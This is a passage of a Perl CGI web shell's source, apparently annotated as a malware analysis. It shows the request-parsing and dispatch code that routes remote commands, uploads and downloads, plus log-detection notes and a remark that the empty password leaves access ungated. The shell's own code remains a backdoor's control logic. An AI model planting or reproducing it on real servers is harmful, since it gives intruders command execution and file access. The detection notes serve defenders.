  758.     if($Options eq "go")
  759.     {
  760.         &SendFileToBrowser($TargetFile);
  761.     }
  762.     else
  763.     {
  764.         &PrintDownloadLinkPage($TargetFile);
  765.     }
  766. }
  767.  
  768.  
  # Analysis notes (code unchanged): script entry point. It parses the request
  # and cookies, copies request parameters into globals, then dispatches on "a".
  # Detection: requests to a CGI path using the parameters a, c, d, f, o, p,
  # with "a" set to login, command, upload, download, kasber, zone, home or
  # logout, match this shell's interface in web server logs.
  769. &ReadParse;
  770. &GetCookies;
  771.  
  772. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  773. $ServerName = $ENV{'SERVER_NAME'};
  # p = password, c = command line, f = file name, o = option flag.
  774. $LoginPassword = $in{'p'};
  775. $RunCommand = $in{'c'};
  776. $TransferFile = $in{'f'};
  777. $Options = $in{'o'};
  778.  
  # A missing action defaults to "login".
  779. $Action = $in{'a'};
  780. $Action = "login" if($Action eq "");
  781.  
  782.  
  # The working directory comes from the request; when absent it is taken from
  # the output of pwd (or "cd" on Windows).
  783. $CurrentDir = $in{'d'};
  784. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  785.  
  # The session check is a string comparison of the SAVEDPWD cookie with
  # $Password. With $Password set to "" as in this paste, a missing cookie also
  # compares equal, so the check does not gate access in the configuration shown.
  786. $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
  787.  
  788. if($Action eq "login" || !$LoggedIn)
  789. {
  790.     &PerformLogin;
  791. }
  792. elsif($Action eq "command")
  793. {
  794.     &ExecuteCommand;
  795. }
  796. elsif($Action eq "upload")
  797. {
  798.     &UploadFile;
  799. }
  800. elsif($Action eq "download")
  801. {
  802.     &DownloadFile;
  803. }
  804. elsif($Action eq "kasber")
  805. {
  806.     &kasber;
  807. }
  808. elsif($Action eq "zone")
  809. {
  810.     &zone;
  811. }
  812. elsif($Action eq "home")
  813. {
  814.     &home;
  815. }
  816. elsif($Action eq "logout")
  817. {
  818.     &PerformLogout;
  819. }